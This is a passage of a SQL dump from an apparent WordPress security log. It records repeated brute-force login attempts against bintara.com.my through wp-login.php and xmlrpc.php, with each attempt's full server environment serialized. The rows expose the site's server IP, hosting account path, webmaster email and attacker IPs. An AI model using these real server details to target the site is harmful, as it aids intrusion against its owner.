17:19:42',17740424,19230192,'https://bintara.com.my/wp-login.php',1,0,'185.52.2.165'),(24657,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.52.2.165\";s:11:\"REMOTE_PORT\";s:5:\"57072\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEVsX-mRYMgL5SYt2ERrwAAAVU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568740785.6011\";s:12:\"REQUEST_TIME\";s:10:\"1568740785\";}}','notice','2019-09-17 17:19:47','2019-09-17 17:19:45',18258936,19556464,'https://bintara.com.my/xmlrpc.php',1,0,'185.52.2.165'),(24658,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"46206\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEW23-mRYMgL5SYt2ER7gAAAUI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568741084.1456\";s:12:\"REQUEST_TIME\";s:10:\"1568741084\";}}','notice','2019-09-17 17:24:47','2019-09-17 17:24:44',17739856,19231688,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(24659,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"46982\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEW4UViJhUiKk@yAoe-agAAAYM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568741089.1823\";s:12:\"REQUEST_TIME\";s:10:\"1568741089\";}}','notice','2019-09-17 17:24:50','2019-09-17 17:24:49',18257216,19556208,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(24660,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"31.207.36.139\";s:11:\"REMOTE_PORT\";s:5:\"40810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEW@EViJhUiKk@yAoe-eAAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568741113.0046\";s:12:\"REQUEST_TIME\";s:10:\"1568741113\";}}','notice','2019-09-17 17:25:15','2019-09-17 17:25:13',17740248,19230648,'https://bintara.com.my/wp-login.php',1,0,'31.207.36.139'),(24661,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"31.207.36.139\";s:11:\"REMOTE_PORT\";s:5:\"42102\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEW-X-mRYMgL5SYt2ESDAAAAUU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568741117.2738\";s:12:\"REQUEST_TIME\";s:10:\"1568741117\";}}','notice','2019-09-17 17:25:18','2019-09-17 17:25:17',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'31.207.36.139'),(24662,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.138.189.181\";s:11:\"REMOTE_PORT\";s:5:\"39034\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEYmETYugiOK@HgvAFm4AAAAQM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568741528.209\";s:12:\"REQUEST_TIME\";s:10:\"1568741528\";}}','notice','2019-09-17 17:32:10','2019-09-17 17:32:08',17744744,19230968,'https://bintara.com.my/wp-login.php',1,0,'192.138.189.181'),(24663,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.138.189.181\";s:11:\"REMOTE_PORT\";s:5:\"39034\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEYmETYugiOK@HgvAFm4AAAAQM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568741528.209\";s:12:\"REQUEST_TIME\";s:10:\"1568741528\";}}','notice','2019-09-17 17:32:11','2019-09-17 17:32:08',17906368,19230968,'https://bintara.com.my/wp-login.php',1,0,'192.138.189.181'),(24664,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.138.189.181\";s:11:\"REMOTE_PORT\";s:5:\"40378\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEYnH-mRYMgL5SYt2ESYQAAAU4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568741532.7007\";s:12:\"REQUEST_TIME\";s:10:\"1568741532\";}}','notice','2019-09-17 17:32:14','2019-09-17 17:32:13',18258552,19558160,'https://bintara.com.my/xmlrpc.php',1,0,'192.138.189.181'),(24665,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"59062\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEZ5kViJhUiKk@yAofBCwAAAYE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568741863.0293\";s:12:\"REQUEST_TIME\";s:10:\"1568741863\";}}','notice','2019-09-17 17:37:44','2019-09-17 